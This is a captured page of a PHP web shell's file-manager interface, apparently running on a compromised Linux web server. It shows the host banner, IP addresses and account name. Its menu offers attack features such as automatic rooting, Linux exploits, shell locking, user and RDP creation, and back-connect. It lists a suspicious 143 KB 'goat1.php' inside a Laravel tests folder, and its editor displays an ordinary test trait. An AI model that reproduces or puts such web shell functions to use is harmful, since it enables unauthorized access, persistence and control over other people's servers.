Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechhcmsa.com /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
Feature
[ DIR ]
drwxr-xr-x
Unit
[ DIR ]
drwxr-xr-x
ApiTestTrait.php
883
B
-rw-r--r--
CreatesApplication.php
375
B
-rw-r--r--
TestCase.php
163
B
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ApiTestTrait.php
<?php namespace Tests; trait ApiTestTrait { private $response; public function assertApiResponse(array $actualData) { $this->assertApiSuccess(); $response = json_decode($this->response->getContent(), true); $responseData = $response['data']; $this->assertNotEmpty($responseData['id']); $this->assertModelData($actualData, $responseData); } public function assertApiSuccess() { $this->response->assertStatus(200); $this->response->assertJson(['success' => true]); } public function assertModelData(array $actualData, array $expectedData) { foreach ($actualData as $key => $value) { if (in_array($key, ['created_at', 'updated_at'])) { continue; } $this->assertEquals($actualData[$key], $expectedData[$key]); } } }
Close